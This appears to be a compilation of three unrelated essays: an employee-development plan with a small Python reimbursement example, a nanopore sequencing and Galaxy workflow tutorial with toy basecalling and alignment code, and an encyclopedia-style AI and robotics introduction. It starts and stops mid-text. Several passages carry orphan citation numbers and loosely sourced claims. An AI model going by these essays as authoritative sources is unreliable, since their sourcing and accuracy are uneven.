(http://knowledge.wharton.upenn.edu).
Furthermore, training and development can exert a positive influence on the recruiting process. First, managers may wish to hire an outstanding candidate who does not meet every job requirement because he or she lacks a certain skill. If the company is ready to offer training to develop the missing skill, it could win a valuable employee who may be responsible for future performance. For example, a person applying for a PR executive position may be rejected for failing to meet a single requirement, such as updating the company’s website. Although he or she is a performer and a fast learner, the organization prefers to hire a less brilliant candidate who barely meets all the requirements instead of investing in a few courses for the first one. Such a decision may greatly affect the company’s performance and image.
Secondly, development programs may prove enticing to potential employees. Therefore, the company can use them to attract the desired staff capable of driving the organization’s growth. Thirdly, if existing employees are trained for different or more complex tasks, they may become eligible for vacant positions or may handle a wider range of activities. In this context, the company saves money by reducing its need to hire. Fourthly, development rewards loyal employees who, after learning new skills, are promoted to higher positions. This also contributes to a company’s performance. Lastly, development strategies allow employees to be more independent or, in other words, give them wings to fly. This autonomy cuts supervision costs, thus increasing the company’s efficiency and, inherently, performance (Gross, 2000).
Employee training also plays a major part in maintaining a work/life balance. This is essential for the organization’s health, because the employee burnout phenomenon can decrease productivity or have other negative consequences, such as sickness, lateness, and absenteeism as a result of unusual stress; lower efficiency and morale because of an exaggerated workload; and higher turnover rates. Consequently, employees should be helped to handle both work and life commitments through training that teaches them how to better manage time and priorities or how to recharge their batteries after projects or seasons involving an unusual amount of work. In response to the company’s concern, an employee may prove unexpectedly grateful and may voluntarily contribute to a future project essential to the organization’s success (Gross, 2000).
Employment Development Plan
Hiring
The first step in employee development is the hiring process. When there is an opening, the department head will meet with human resources to determine exactly what the new job requirements will be. In addition, at this time there will be a discussion about where the position may lead in the future and what type of education or skills will be important for the path to be followed (Bass, 1985). Hiring in the future will involve a careful screening of applicants to select the most qualified for the particular position in question. In the past, it was accepted practice to hire the first qualified applicant in order to get the position filled. In the future, this will change, improving the company’s employee retention rate. Applicants will be carefully examined so that the candidate who is most likely to advance within the company is selected. Hiring will happen by way of Internet sources, employee referrals, recruiters, and job fairs. When an opening occurs, it will be publicized in several publications so that the company will have a diverse applicant pool from which to select those who will be interviewed (Steines and Kleiner, 2003).
Training
Employee development is an expensive process. The company invests funds to train the employee, then to train the employee further, and then possibly to invest in the employee’s college education as well. All of this is done in the hope that the company will eventually reap the benefits of the investments made on the employee’s behalf (Liggett, 2007). The company’s employee development plan has changed to be more cautious about fund investments at the front end of the employee’s history with the company, while on the back end, as time moves forward, the benefits are increased from previous years. When an employee is first hired, there will be a three-day training period during which the employee will view the videos and company policies, be given tours of the company, and engage in a discussion about future possibilities. After the three days have passed, the employee will begin working alongside someone in the chosen department who will assist with acclimation (Liggett, 2007). While this will cost time and money, because the training or supervising peer will have to slow down their own work when the new employee needs help, it is still less expensive than paying for the new employee to spend time in a training institution. The training will initially cover nothing more than the job the employee was hired to do. At the first three-day session, however, the employee will be told of the entire development package so that the employee understands what the future holds and what staying with the company can mean. There will also be an employee suggestion box outside the cafeteria, from which ideas for development will be read and discussed quarterly (Liggett, 2007).
Development based on time
The entire foundation of this employee development plan is to reward employees for loyalty and longevity. The plan is based on a staggered schedule that allows the company to provide the best benefits to those who stay with the company (Redling, 2003). The reward is an incentive for employees to remain in the employ of the company while offering the company some assurance that it is investing in long-term workers. It also reduces the loss of funds that occurs when a short-term employee goes to a competitor after receiving training at this company. Because the company’s new policy places the bulk of the benefits on the back end of employment, they must be made better than they were before, so that employees want to stay and reap the rewards of the new package.
After six months of employment, the employee may request that a cross-training package be started. In this package, the employee will be trained in other departments so that he or she can work throughout the company in several different capacities. The company will provide a temporary worker to perform the employee’s duties while the employee is cross-training for the other department (Redling, 2003). Every six months the employee will be encouraged to choose another department in which he or she wishes to be cross-trained, and the company will provide a temporary worker so that the employee can devote a full forty-hour week to learning the new skill. There will be no limit on the number of departments in which an employee can be cross-trained, as long as at least six months are worked at the regular position between training sessions. This allows employees to develop their skills and provides additional backup support for the company, because the employee can handle multiple tasks within the company (Redling, 2003).
Promotion
It is important that employees feel they are being treated well and given opportunities to advance in their careers (Solomon, 2002). Any time there is an opening, the company’s employees shall have the first opportunity to apply for it. If there is an employee who is qualified, that employee shall be given the job, and hiring will focus on replacing him or her in the old position.
Education
After one year of employment with the company, the employee can apply for the education package, which allows the company to reimburse some costs of education. In years two through four of employment, the company will reimburse the cost of tuition upon receipt of a report card demonstrating a C average in the classes attempted. The classes can be on any subject, but there will be one hundred percent reimbursement for classes pertaining to work and seventy-five percent reimbursement for classes that do not pertain to the industry. During years five through ten, the company will reimburse at one hundred percent not only the cost of tuition but also the cost of books for any classes the employee chooses to take. The employee simply needs to provide a report card at the end of the semester to receive reimbursement.
From years ten to fifteen, the company will not only pay for the employee’s college but will also allow the employee to attend during the workday without docking pay. This applies for up to two hours a day for the duration of employment.
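
As an illustration only, the reimbursement tiers above can be expressed as a small function. The handling of edge cases (eligibility before year two, the exact tier boundaries, how the C-average requirement is encoded) is an assumption, not part of the plan’s text.

```python
def reimbursement(years_employed, tuition, books, work_related, grade_avg="C"):
    """Return the dollar amount reimbursed under the education package."""
    # Below a C average, or before the year-two tier begins, nothing is paid
    # (assumed interpretation of the eligibility rules).
    if years_employed < 2 or grade_avg not in ("A", "B", "C"):
        return 0.0
    if years_employed < 5:
        # Years two through four: tuition only, 100% for work-related
        # classes and 75% for unrelated classes.
        rate = 1.0 if work_related else 0.75
        return rate * tuition
    # Years five and beyond: 100% of tuition plus the cost of books.
    return tuition + books

print(reimbursement(3, 1000, 200, work_related=False))  # → 750.0
print(reimbursement(6, 1000, 200, work_related=False))  # → 1200
```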
The employee development plan allows not only for development of the employee in the area of training but also for staff development. The managers of the company will attend annual seminars on staff relations so that they can better understand how to communicate with their subordinates (Dowling, 2001). The company wants to focus on employee retention, and part of the reason employees choose to stay with a company or leave it for greener pastures is whether or not they get along well with their superiors. Staff development and relations are an important aspect of employee development, and the annual staff relations seminars target problem communications so that employees will continue to feel loyal to the company.
Conclusion
Employee development can serve to save funds that the company would otherwise have to write off. Employee turnover is a crucial issue given the current economic standing of America. Employee development allows employees to better equip themselves for their career choices. It is important to support their desire to develop more fully at work, while at the same time not investing money that walks out the door to the competition. This design allows the company to support and assist the employee’s desire to develop career skills while discouraging a cash loss. If the employee stays with the company, the development program risks very little of the company’s assets before the employee has proved to be a long-term investment. The plan allows employees to fully develop and to feel that the company rewards the loyalty they have shown through years of service, while encouraging education as well as cross-training. The organizational consultant, per the research information and plan, challenges the organization to embrace the detailed plan to further develop each valuable employee. No matter what, organizational leaders must see the value in employee development and be willing to make the effort to show loyalty to their employees.
References
Bass, B. M. (1985). Leadership and Performance Beyond Expectations. New York, NY: Free Press.
Dowling, F. (2001). “Just the Job: Bosses need work on staff relations.” Birmingham Post. January 6, 22 pp.
Function 7: Employee education, training, and development. (2006). [Online], Available:http://www.accel-team.com/human_resources/hrm_07.html (2008, January 30).
Giving Employees What They Want: The Returns Are Huge. (2005). [Online], Available: http://knowledge.wharton.upenn.edu/article.cfm?articleid=1188&CFID=3898075&CFTOKEN=53249968 (2008, January 30).
Goldstein, S. (2003). “Employee Development: An examination of service strategy in a high-contact service environment.” Production and Operations Management. Summer.
Gross, B. (2000). Effective Training Programs for Managers, [Online], Available: http://www.allbusiness.com/human-resources/careers-job-training/2975408-3.html (2008, January 30).
Helping Employees Maintain Work/Life Balance. (2006). [Online], Available: http://www.allbusiness.com/human-resources/employee-development-employee-productivity/1242-1.html (2008, January 30).
Liggett, D. (2007). “Training and qualifying your employees.” Industry Applications Magazine. May, Vol. 13, Issue 3. pp.25-30.
Redling, R. (2003). “Assembling a solid staff: Job rotation, job shaping and cross training help employee retention.” Connexion/Medical Group Management Association. March, Vol. 3, pp. 38-40.
Sirota, D., L. Mischkind, and Michael Meltzer. (2005). The Enthusiastic Employee: How Companies Profit by Giving Workers What They Want. University City, PA: Wharton School Publishing.
Steines, S. R., and B. H. Kleiner. (2003). “Keys to Hiring Employees Effectively.” Management Research News. Volume 26, Issue 2/3/4, pp. 170-180.
Solomon, M. (2002). “Discovering the Leader Within.” Computerworld. August 5, 38 pp.
YPM Briefing: Employee development. (2005). [Online], Available: http://www.yourpeoplemanager.com/YarBGXpoTX_-WA.html (2008, January 30).

## Nanopore Sequencing: Structure, Principles and Applications

Nanopore Sequencing

The underlying force behind the rapid advancements in genomics is the development of novel genome sequencing technologies. Notably, the invention of second-generation sequencing gave scientists and other innovators the throughput and cost-efficiency necessary to sequence thousands of genomes, which in the past was deemed infeasible. The recent past has seen the dawn of what can be considered a third generation, which allows amplification-free reading of DNA molecules in consecutive long stretches. This new generation is defined by two methods:

Nanopore sequencing and single-molecule real-time sequencing (SMRT)

Oxford Nanopore Technologies (ONT)

Nanopore sequencing is currently the easiest sequencing methodology to describe. A single small pore is inserted into an insulating membrane, and an electrical potential is applied across the membrane. The DNA strand is pulled through the pore, and the sequence is inferred from the current produced by the passing base combinations. David Deamer came up with a rough sketch of this concept in 1989, and its implementation took almost two decades.

Principle Behind Nanopore Sequencing

MinION nanopore sequencing uses a very basic principle: strands of DNA or nucleotide bases are driven into a nanopore electrophoretically.

Single-stranded DNA fragments are introduced into the nanopore through its microscopic opening. The nanopore sits in an insulating membrane between two compartments filled with saline solution, and an electric potential is applied across it. DNA strands or fragments are added to one of the compartments and allowed to pass through the nanopore, where they are captured by the electric field and threaded through the pore. The way in which the bases influence the electric current through the nanopore is measured, and these measurements can be decoded to retrieve the DNA sequence.

https://f1000research.com/articles/6-1083/v2
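
As a toy illustration of the decoding idea, the sketch below maps each measured current level to the nearest of a set of per-base reference levels. Real basecallers model k-mer current signatures with HMMs or neural networks; the current values here are invented, not measured.

```python
# Hypothetical per-base mean current levels in picoamps (invented values):
REFERENCE_LEVELS = {"A": 80.0, "C": 95.0, "G": 110.0, "T": 65.0}

def decode(currents):
    """Decode a list of current measurements by nearest reference level."""
    seq = []
    for i in currents:
        base = min(REFERENCE_LEVELS, key=lambda b: abs(REFERENCE_LEVELS[b] - i))
        seq.append(base)
    return "".join(seq)

print(decode([79.2, 96.1, 66.0, 111.3]))  # → ACTG
```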

Two kinds of pores

a) Biological pore

b) Solid-state pore

Charge and Structure of the Nanopore

“The structural property which makes the biological pore suitable for DNA sequencing is a constriction site at which the passing strand exerts the most influence on the electrical current”. The length of this passage largely determines how many bases influence the electric potential, that is, the number of bases that are “read” concurrently at any given time. This number should be low enough to allow the electric current for each different combination of bases to be identified, yet high enough to allow overlap between subsequent combinations of bases. This overlap is an advantage during basecalling, as it allows each base to be read as many times as possible.

https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5770995/
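
The overlapping-read idea above can be illustrated with a short sketch: if the pore senses k bases at once and the strand advances one base per step, each interior base appears in up to k successive measurements. The sequence and k value below are arbitrary examples.

```python
def kmer_signals(seq, k=5):
    """List the successive k-base windows 'seen' by the pore."""
    return [seq[i:i + k] for i in range(len(seq) - k + 1)]

seq = "GATTACAGT"
reads = kmer_signals(seq, k=5)
# Count how many windows cover each base position — interior bases are
# covered by k consecutive windows, giving basecalling its redundancy.
coverage = {i: sum(1 for j in range(len(reads)) if j <= i < j + 5)
            for i in range(len(seq))}
print(reads)
print(coverage)
```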

To initiate sequencing, the DNA strand first needs to move toward one side of the pore, called the cis side. There it is captured by the electric field, threaded through the pore, and emerges on the other side, called the trans side.

Here two forces are taken into consideration. The electrophoretic force is induced by the positive electric potential applied at the trans side, which attracts the negatively charged DNA and drags it in. As the negative particles leave the cis side, positive particles move in the opposite direction. The capture of the DNA strand is strengthened by the formation of a positively charged zone around the cis entrance of the pore. The electro-osmotic force is induced by the net flow of ions and water through the pore, which in turn is influenced by strand translocation.

The advantages of nanopore sequencing include the following:

a)      Target molecules can be detected at very low concentrations.

b)      Biomarkers or genes can be screened.

c)      Analysis can be provided quickly and at low cost.

Because nanopore sequencing produces quick results, it can be used as a powerful diagnostic tool for identifying infectious agents. Its advantages in time to pathogen identification and in read length meet a pressing need in hospital environments.

Lambda Phage DNA Sequencing with MinION Nanopore Technology

The MinION is a gene sequencer small enough to fit into a pocket, developed by Oxford Nanopore. The MinION's main goal is to read the genetic bases in DNA in real time using the nanopore sequencing methodology. MinION nanopore sequencing uses a very basic principle: strands of DNA are driven into a nanopore electrophoretically.

Main Goal

The main goal of sequencing Lambda phage DNA using MinION nanopore sequencing is to show that it can produce long reads that are accurate enough to be aligned back to their reference genome. This makes it possible to sequence a genome in real time and obtain results with reasonable accuracy; the accuracy of the MinION sequencer is generally around ~93%. Because it is portable and affordable, produces data at great speed, and is able to produce long reads, it is well suited to real-time use.

Illumina HiSeq vs MinION

The difference between Illumina sequencing and MinION nanopore sequencing is that Illumina is a second-generation DNA sequencer that produces data on a high-throughput platform. It produces short reads that are highly accurate. The drawbacks of the Illumina sequencer are that it is not portable and is expensive; it cannot be used in real-time applications and needs a laboratory to run. MinION sequencing, by contrast, produces very long reads, up to a few megabases. It is cost-effective, portable (about the size of a cell phone), and can be used in real-time applications such as clinical diagnosis and pathogen surveillance, and it does not need a laboratory bench for library preparation.

The Illumina sequencer produces genome assemblies at a low price, but its ability to resolve long repeats from short reads is very limited. The opposite holds for the MinION, where long reads can span expanded repeat sequences.

Getting started with the MinION sequencer

To get started with the MinION sequencer, a reasonably powerful computer is needed, and a dummy flow cell is used to verify the hardware and software setup by running a data-exchange test.

After checking that the dummy flow cell is working, we open the MinKNOW GUI icon on the desktop and establish a connection remotely.

We then enter the flow cell ID and sample ID to be used. Here we sequence a small viral genome, Lambda phage, and compare it with its reference.

To run the basecalling step, which is also called the MinION burn-in, we need to set up all the required reagents and materials.

Library preparation

Before the genetic sample can be loaded onto the sequencer, it must undergo a few processing steps. This is called library preparation because we break the long strands of DNA into a library of DNA fragments with special sequences on their ends.

Here we used a ready-made kit to prepare the library. For performing MinION nanopore sequencing in real time, such a kit is helpful, since a laboratory for library preparation is not always available in the field.

https://nanoporetech.com/resource-centre/dna-extraction-and-library-preparation-rapid-genus-and-species-level-identification
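The fragmentation-plus-adapters idea behind library preparation can be sketched as follows. This is a toy illustration: the adapter sequences and fragment length are invented, and a real kit shears DNA enzymatically and ligates chemistry-specific adapters.

```python
# Toy library preparation sketch: shear a long DNA strand into fragments
# and attach (hypothetical) adapter sequences to each end.
ADAPTER_5 = "GGTT"  # invented 5' adapter
ADAPTER_3 = "AACC"  # invented 3' adapter

def prepare_library(strand, fragment_len=8):
    """Cut the strand into fixed-size fragments and add adapters."""
    fragments = [strand[i:i + fragment_len]
                 for i in range(0, len(strand), fragment_len)]
    return [ADAPTER_5 + frag + ADAPTER_3 for frag in fragments]

library = prepare_library("ACGTACGTTTGACCAGT")
for read in library:
    print(read)
```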

Real time sequencing

With the library prepared, we load the sample into the MinION, which is connected to a computer or laptop for sequencing. The prepared DNA is loaded into the flow cell and then flows over a membrane spotted with nanopores. We must make sure that no air bubbles flow across the membrane. The electrical signatures of the DNA bases are read, as they pass through the pores, by the electronics inside the flow cell.

We can visualize the status of each pore as it functions; if many pores in the flow cell are active, this is easily seen. Incoming data can be visualized as soon as sequencing starts. The results are produced as FASTQ files.
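A FASTQ record consists of four lines: an identifier, the sequence, a separator, and per-base quality scores. A minimal parser might look like the sketch below (the record shown is invented for illustration):

```python
def parse_fastq(lines):
    """Yield (identifier, sequence, quality) tuples from FASTQ lines."""
    lines = [ln.rstrip("\n") for ln in lines]
    for i in range(0, len(lines), 4):
        ident, seq, _sep, qual = lines[i:i + 4]
        yield ident.lstrip("@"), seq, qual

# A single invented FASTQ record.
record = [
    "@read_001\n",
    "ACGTTGCA\n",
    "+\n",
    "IIIIHHGG\n",
]
for ident, seq, qual in parse_fastq(record):
    print(ident, seq, len(qual))  # read_001 ACGTTGCA 8
```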

Now the results can be analyzed using the Galaxy platform. IGV is used as visualization software to view the reads generated by the sequencer.

Below are the steps performed to analyze the MinION nanopore sequencer output files.

https://nanoporetech.com/how-it-works

a)      Map the raw sequence reads provided to you (use 5 FASTQ files) to the Lambda DNA reference sequence.

The Galaxy platform is used for the analysis of the output files obtained from MinION nanopore sequencing. It is an open-source platform for analyzing data from biomedical research. Its aim is to make computational biology accessible to scientists and researchers without computational expertise, and it performs all the tasks necessary to create a bioinformatics workflow.


Here we use the Galaxy platform to analyze the raw sequence reads (FASTQ files) generated by MinION sequencing. The analysis involves mapping these raw reads to the Lambda reference sequence, downloaded from NCBI GenBank (Nucleotide) in FASTA format. The accession number for Enterobacteria phage lambda, complete genome, is NC_001416.1.

Input Data

Here we upload the FASTQ files obtained from the Lambda phage sequencing run. The reference file is also uploaded along with the output files so that the interpretation can be checked.

Figure 2 FASTQ and reference files are uploaded into the Galaxy platform

Custom reference Genome

A custom reference genome is a reference containing the nucleotide sequence of the scaffolds, transcripts, or chromosomes of a species, identified by a build name. The reference genome in FASTA format is picked up automatically from the file uploaded earlier. To assign our reference genome, I specify the build name as Lambda_Enterobacteria and the build key as Lambda_Reference, selecting the reference dataset.

Figure 3 Custom Builds to specify the name of the build and the build key.

Concatenation of fastQ files

Concatenation of datasets is done to combine all the FASTQ files into a single entry, so that one file contains all 5 raw sequence reads. Clicking the Text Manipulation tool displays many options; among them is “Concatenate datasets tail-to-head (cat)”, which joins all the datasets into one. While selecting files for concatenation, we must make sure to select only the raw FASTQ files and not the reference genome file.

Figure 4 Concatenation of datasets from tail to head
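The concatenation step is simple enough to sketch directly. The snippet below is a minimal Python equivalent of Galaxy's tail-to-head concatenation; the file names and records are invented for the demo.

```python
import os
import tempfile

def concatenate(paths, out_path):
    """Write the contents of each input file, in order, to out_path."""
    with open(out_path, "w") as out:
        for path in paths:
            with open(path) as f:
                out.write(f.read())

# Demo with two tiny invented FASTQ files in a temporary directory.
tmp = tempfile.mkdtemp()
inputs = []
for name, rec in [("run1.fastq", "@r1\nACGT\n+\nIIII\n"),
                  ("run2.fastq", "@r2\nTTTT\n+\nHHHH\n")]:
    path = os.path.join(tmp, name)
    with open(path, "w") as f:
        f.write(rec)
    inputs.append(path)

merged = os.path.join(tmp, "all_reads.fastq")
concatenate(inputs, merged)
```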

The output of “Concatenate datasets tail-to-head” is shown below: one large dataset combining all 5 FASTQ files.

The concatenated file as one large dataset.

Figure 5 Output page of the concatenated datasets

BWA MEM Mapping

BWA-MEM is an algorithm for aligning sequence reads, used to align query sequences against a reference genome. BWA (Burrows-Wheeler Aligner) is software for mapping sequences of low divergence against long reference genomes. It performs chimeric alignment, supports paired-end reads, and chooses between end-to-end and local alignments. It is robust to sequencing errors and is applicable to sequence lengths from a few base pairs to several megabases.

In our context we align the concatenated FASTQ file with the reference genome. BWA-MEM takes FASTQ files as input and produces output in BAM format. This BAM file is then used by various downstream utilities.
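To give a feel for what a mapper does, the sketch below finds candidate positions for a read in a reference by exact seed matching and then scores the whole read at each candidate. This is emphatically not BWA-MEM, which builds an FM-index over the Burrows-Wheeler transform and performs sophisticated seeding, chaining and extension; the sequences here are invented.

```python
# Toy seed-and-extend mapping sketch (NOT the real BWA-MEM algorithm).
def map_read(reference, read, seed_len=4):
    """Find candidate positions via exact seed matches, then score the
    whole read at each candidate by counting matching bases."""
    seed = read[:seed_len]
    best_pos, best_score = -1, -1
    start = reference.find(seed)
    while start != -1:
        window = reference[start:start + len(read)]
        score = sum(a == b for a, b in zip(window, read))
        if score > best_score:
            best_pos, best_score = start, score
        start = reference.find(seed, start + 1)
    return best_pos, best_score

ref = "TTGACCAGTACGTACGTTTGA"  # invented reference
pos, score = map_read(ref, "AGTACGTA")
print(pos, score)  # 6 8
```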

Figure 6 Performing NGS mapping with BWA-MEM for medium and long reads against the reference genome.

The output file is generated from the two input files, the concatenated dataset and the reference file. The mapped reads are in BAM format.

Figure 7 Results of the Mapping

By clicking on this we can visualize the aligned sequence.

Figure 8 Final mapped file, from which the BAI and BAM datasets can be downloaded for further analysis.

Trackster is a visualization tool for large datasets. It is a very interactive and fast visualization browser.

Figure 9 Visualization of the files using Trackster

After clicking on Trackster, a new window pops up asking whether to visualize the dataset in a new track or in an already existing track, as shown below.

Figure 10 Window to select viewing in a new visualization track

Galaxy has a well-integrated visualizer with tools for self-guided exploration of the data; dynamic filters help in understanding the analyzed data. In the visualization window we can view the genomic region from 0 to 48,501. To select a more specific genomic region, we can specify the chromosomal location, giving the start and end coordinates of the region. After choosing to visualize the dataset in a new visualization track, we must specify the name of the browser and the reference genome build.

Figure 11 Naming the Browser name for the new visualization window.

Visualization

Figure 12 The aligned sequences are visualized

Workflow

The workflow of the above process is listed step by step in the workflow window. It contains every single step used to run the data. After extraction, the workflow can be named, e.g. Lambda DNA. Naming helps in retrieving the workflow from the history so that it can be edited whenever necessary.

Figure 13 The Workflow of the above applied steps

Overall Workflow

The overall workflow of this project, with the active steps, is shown below as a flow chart.

Figure 14 Workflow Canvas of the Lambda DNA reference sequence

Figure 15 Login for my Galaxy platform

Integrative Genomics Viewer (IGV)

IGV is a lightweight, interactive exploration tool for high-performance visualization of integrated genomic datasets. It supports array-based and next-generation sequencing data, genomic annotations, mutations, copy number and methylation. IGV uses efficient file formats, such as multi-resolution files, for real-time analysis of large datasets. Data can be loaded from remote or local sources.

IGV supports visualization of diverse data types across many samples, and correlation of these integrated datasets with clinical and phenotypic variables. Sample annotations can easily be defined and linked to data tracks using a tab-delimited format.

Here we are using IGV to visualize the mapped reads obtained from the Galaxy platform.

References

1.       Robinson, J.T., Thorvaldsdóttir, H., Winckler, W., Guttman, M., Lander, E.S., Getz, G. and Mesirov, J.P. Integrative Genomics Viewer.

2.       Lu, H., Giordano, F. and Ning, Z. Oxford Nanopore MinION Sequencing and Genome Assembly. National Centre of Gene Research, Chinese Academy of Sciences, Shanghai 200233, China; The Wellcome Trust Sanger Institute, Wellcome Genome Campus, Hinxton, Cambridge CB10 1SA, UK. Received 9 March 2016, revised 7 May 2016, accepted 31 May 2016, available online 17 September 2016. Handled by Jun Yu.

## Artificial Intelligence and Robotics Applications

I. Introduction
Artificial intelligence (AI) is the intelligence of machines and the branch of computer science that aims to create it. Textbooks define the field as “the study and design of intelligent agents,”[1] where an intelligent agent is a system that perceives its environment and takes actions that maximize its chances of success.[2] John McCarthy, who coined the term in 1956,[3] defines it as “the science and engineering of making intelligent machines”. The field was founded on the claim that a central property of humans, intelligence (the sapience of Homo sapiens), can be so precisely described that it can be simulated by a machine. This raises philosophical issues about the nature of the mind and the limits of scientific hubris, issues which have been addressed by myth, fiction and philosophy since antiquity.[6] Artificial intelligence has been the subject of optimism,[7] but has also suffered setbacks[8] and, today, has become an essential part of the technology industry, providing the heavy lifting for many of the most difficult problems in computer science.

AI research is highly technical and specialized, deeply divided into subfields that often fail to communicate with each other.[10] Subfields have grown up around particular institutions, the work of individual researchers, the solution of specific problems, longstanding differences of opinion about how AI should be done, and the application of widely differing tools. The central problems of AI include such traits as reasoning, knowledge, planning, learning, communication, perception and the ability to move and manipulate objects.[11] General intelligence (or “strong AI”) is still a long-term goal of (some) research.


AI plays a major role in the field of robotics. The word robot can refer to both physical robots and virtual software agents, but the latter are usually referred to as bots.[3] There is no consensus on which machines qualify as robots, but there is general agreement among experts and the public that robots tend to do some or all of the following: move around, operate a mechanical limb, sense and manipulate their environment, and exhibit intelligent behaviour, especially behaviour which mimics humans or other animals. There is conflict about whether the term can be applied to remotely operated devices, as the most common usage implies, or solely to devices which are controlled by their software without human intervention. In South Africa, robot is an informal and commonly used term for a set of traffic lights. It is difficult to compare numbers of robots in different countries, since there are different definitions of what a “robot” is.
The International Organization for Standardization gives a definition of robot in ISO 8373: “an automatically controlled, reprogrammable, multipurpose, manipulator programmable in three or more axes, which may be either fixed in place or mobile for use in industrial automation applications.”[5] This definition is used by the International Federation of Robotics, the European Robotics Research Network (EURON), and many national standards committees. The Robotics Institute of America (RIA) uses a broader definition: a robot is a “re-programmable multi-functional manipulator designed to move materials, parts, tools, or specialized devices through variable programmed motions for the performance of a variety of tasks.”[7] The RIA subdivides robots into four classes: devices that manipulate objects with manual control, automated devices that manipulate objects with predetermined cycles, programmable and servo-controlled robots with continuous point-to-point trajectories, and robots of this last type which also acquire information from the environment and move intelligently in response. There is no one definition of robot which satisfies everyone, and many people have their own.[8] For example, Joseph Engelberger, a pioneer in industrial robotics, once remarked: “I can’t define a robot, but I know one when I see one.”[9] According to Encyclopaedia Britannica, a robot is “any automatically operated machine that replaces human effort, though it may not resemble human beings in appearance or perform functions in a humanlike manner”.[10] Merriam-Webster describes a robot as a “machine that looks like a human being and performs various complex acts (as walking or talking) of a human being”, or a “device that automatically performs complicated often repetitive tasks”, or a “mechanism guided by automatic controls”. Modern robots are usually used in tightly controlled environments such as on assembly lines because they have difficulty responding to unexpected interference.
Because of this, most humans rarely encounter robots. However, domestic robots for cleaning and maintenance are increasingly common in and around homes in developed countries, particularly in Japan. Robots can also be found in the military.
II. HISTORY
Mechanical or “formal” reasoning has been developed by philosophers and mathematicians since antiquity. The study of logic led directly to the invention of the programmable digital electronic computer, based on the work of mathematician Alan Turing and others. Turing’s theory of computation suggested that a machine, by shuffling symbols as simple as “0” and “1”, could simulate any conceivable act of mathematical deduction.[23] This, along with recent discoveries in neurology, information theory and cybernetics, inspired a small group of researchers to begin to seriously consider the possibility of building an electronic brain.[24]
The field of AI research was founded at a conference on the campus of Dartmouth College in the summer of 1956.[25] The attendees, including John McCarthy, Marvin Minsky, Allen Newell and Herbert Simon, became the leaders of AI research for many decades.[26] They and their students wrote programs that were, to most people, simply astonishing:[27] computers were solving word problems in algebra, proving logical theorems and speaking English.[28] By the middle of the 1960s, research in the U.S. was heavily funded by the Department of Defense[29] and laboratories had been established around the world.[30] AI’s founders were profoundly optimistic about the future of the new field: Herbert Simon predicted that “machines will be capable, within twenty years, of doing any work a man can do”[31] and Marvin Minsky  agreed, writing that “within a generation … the problem of creating ‘artificial intelligence’ will substantially be solved”.[32]
In the early 1980s, AI research was revived by the commercial success of expert systems,[35] a form of AI program that simulated the knowledge and analytical skills of one or more human experts. By 1985 the market for AI had reached over a billion dollars. At the same time, Japan’s fifth generation computer project inspired the U.S and British governments to restore funding for academic research in the field.[36]
Stories of artificial helpers and companions, and attempts to create them, have a long history, but fully autonomous machines only appeared in the 20th century. The first digitally operated and programmable robot, the Unimate, was installed in 1961 to lift hot pieces of metal from a die casting machine and stack them. Today, commercial and industrial robots are in widespread use, performing jobs more cheaply or with greater accuracy and reliability than humans. They are also employed for jobs which are too dirty, dangerous or dull to be suitable for humans. Robots are widely used in manufacturing, assembly and packing, transport, earth and space exploration, surgery, weaponry, laboratory research, and mass production of consumer and industrial goods.[4] The word robot was introduced to the public by Czech writer Karel Čapek in his play R.U.R. (Rossum’s Universal Robots), published in 1920.[16] The play begins in a factory that makes artificial people called robots, but they are closer to the modern idea of androids, creatures who can be mistaken for humans. They can plainly think for themselves, though they seem happy to serve. At issue is whether the robots are being exploited and the consequences of their treatment. However, Karel Čapek himself did not coin the word. He wrote a short letter in reference to an etymology in the Oxford English Dictionary in which he named his brother, the painter and writer Josef Čapek, as its actual originator.[16] In an article in the Czech journal Lidové noviny in 1933, he explained that he had originally wanted to call the creatures laboři (from Latin labor, work). However, he did not like the word, and sought advice from his brother Josef, who suggested “roboti”.
III. FIELDS OF ARTIFICIAL INTELLIGENCE
A. Combinatorial Search
Many problems in AI can be solved in theory by intelligently searching through many possible solutions:[96] reasoning can be reduced to performing a search. For example, logical proof can be viewed as searching for a path that leads from premises to conclusions, where each step is the application of an inference rule.[97] Planning algorithms search through trees of goals and subgoals, attempting to find a path to a target goal, a process called means-ends analysis.[98] Robotics algorithms for moving limbs and grasping objects use local searches in configuration space.[67] Many learning algorithms use search algorithms based on optimization. Simple exhaustive searches[99] are rarely sufficient for most real-world problems: the search space (the number of places to search) quickly grows to astronomical numbers. The result is a search that is too slow or never completes. The solution, for many problems, is to use “heuristics” or “rules of thumb” that eliminate choices that are unlikely to lead to the goal (called “pruning the search tree”). Heuristics supply the program with a “best guess” for the path on which the solution lies.[100] A very different kind of search came to prominence in the 1990s, based on the mathematical theory of optimization. For many problems, it is possible to begin the search with some form of a guess and then refine the guess incrementally until no more refinements can be made. These algorithms can be visualized as blind hill climbing: we begin the search at a random point on the landscape, and then, by jumps or steps, we keep moving our guess uphill until we reach the top. Other optimization algorithms are simulated annealing, beam search and random optimization.[101]
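The hill-climbing idea above can be sketched in a few lines. The objective function and step size below are chosen purely for illustration.

```python
# Minimal hill-climbing sketch: refine a guess by repeated uphill steps.
def hill_climb(f, x, step=0.1, iters=1000):
    """Greedily move x left or right while that improves f(x)."""
    for _ in range(iters):
        candidates = [x - step, x + step]
        best = max(candidates, key=f)
        if f(best) <= f(x):
            break  # no neighbour improves the guess: a local optimum
        x = best
    return x

# Maximize f(x) = -(x - 3)^2, whose single peak is at x = 3.
peak = hill_climb(lambda x: -(x - 3) ** 2, x=0.0)
print(round(peak, 1))  # 3.0
```

Note that plain hill climbing stops at the first local optimum it reaches; simulated annealing and random restarts exist precisely to escape such traps.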
Evolutionary computation uses a form of optimization search. For example, an evolutionary algorithm may begin with a population of organisms (the guesses) and then allow them to mutate and recombine, selecting only the fittest to survive each generation (refining the guesses). Forms of evolutionary computation include swarm intelligence algorithms (such as ant colony or particle swarm optimization) and evolutionary algorithms.
B. Neural Network
